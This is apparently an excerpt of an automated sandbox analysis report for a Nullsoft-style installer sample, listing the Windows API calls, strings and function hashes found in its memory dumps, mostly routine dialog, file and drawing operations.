                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                          • EnableWindow.USER32(?,?), ref: 00403F02
                                                                                                          • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                          • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                          • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 184305955-0
                                                                                                          • Opcode ID: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                          • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                          • Opcode Fuzzy Hash: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                          • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D
                                                                                                          APIs
                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                          • GetSysColor.USER32(?), ref: 00404396
                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                          • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                          • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                          • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                          • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                          • String ID: -B@$N$open
                                                                                                          • API String ID: 3615053054-1057335957
                                                                                                          • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                          • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                          • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                          • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                            • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                          • lstrcatW.KERNEL32(00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76F93420,00441800,00000000,0043F000), ref: 0040391F
                                                                                                          • lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76F93420), ref: 0040399F
                                                                                                          • lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                          • GetFileAttributesW.KERNEL32(00432EA0), ref: 004039BD
                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403A06
                                                                                                            • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                          • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                          • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                          • API String ID: 1975747703-1115850852
                                                                                                          • Opcode ID: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                          • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                          • Opcode Fuzzy Hash: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                          • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D
                                                                                                          APIs
                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                          • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                          • String ID: F
                                                                                                          • API String ID: 941294808-1304234792
                                                                                                          • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                          • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                          • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                          • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                          APIs
                                                                                                          • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                          • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                            • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                            • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                          • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                          • wsprintfA.USER32 ref: 00405DFB
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                          • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                            • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                            • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                                                                          • API String ID: 222337774-899692902
                                                                                                          • Opcode ID: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                          • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                          • Opcode Fuzzy Hash: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                          • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                          • lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 0040471B
                                                                                                          • lstrcatW.KERNEL32(?,00432EA0), ref: 00404727
                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                            • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                            • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,76F93420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                            • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                            • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0043F000,76F93420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                            • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,76F93420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                          • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                            • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                            • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                            • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                          • String ID: A
                                                                                                          • API String ID: 2624150263-3554254475
                                                                                                          • Opcode ID: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                          • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                          • Opcode Fuzzy Hash: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                          • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                            • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                            • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                          Strings
                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                                                          • Null, xrefs: 00402EE5
                                                                                                          • Inst, xrefs: 00402ED3
                                                                                                          • (*B, xrefs: 00402E7C
                                                                                                          • soft, xrefs: 00402EDC
                                                                                                          • Error launching installer, xrefs: 00402E3E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                          • String ID: (*B$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                          • API String ID: 4283519449-2478819026
                                                                                                          • Opcode ID: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                          • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                          • Opcode Fuzzy Hash: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                          • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD
                                                                                                          APIs
                                                                                                          • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040613A
                                                                                                          • GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061B8
                                                                                                          • GetWindowsDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061CB
                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                          • SHGetPathFromIDListW.SHELL32(?,00432EA0), ref: 00406215
                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                          • lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                          • lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040629E
                                                                                                          Strings
                                                                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186
                                                                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                          • API String ID: 900638850-730719616
                                                                                                          • Opcode ID: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                          • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                          • Opcode Fuzzy Hash: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                          • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountTick$wsprintf
                                                                                                          • String ID: jA$ jA$... %d%%
                                                                                                          • API String ID: 551687249-2167919867
                                                                                                          • Opcode ID: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                          • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                          • Opcode Fuzzy Hash: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                          • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA
                                                                                                          APIs
                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                          • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                          • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                          • GetSysColor.USER32(?), ref: 004041E4
                                                                                                          • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                          • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2320649405-0
                                                                                                          • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                          • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                          • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                          • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                          APIs
                                                                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                            • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                          • String ID: 9
                                                                                                          • API String ID: 163830602-2366072709
                                                                                                          • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                          • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                          • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                          • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(0042C248,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                          • lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
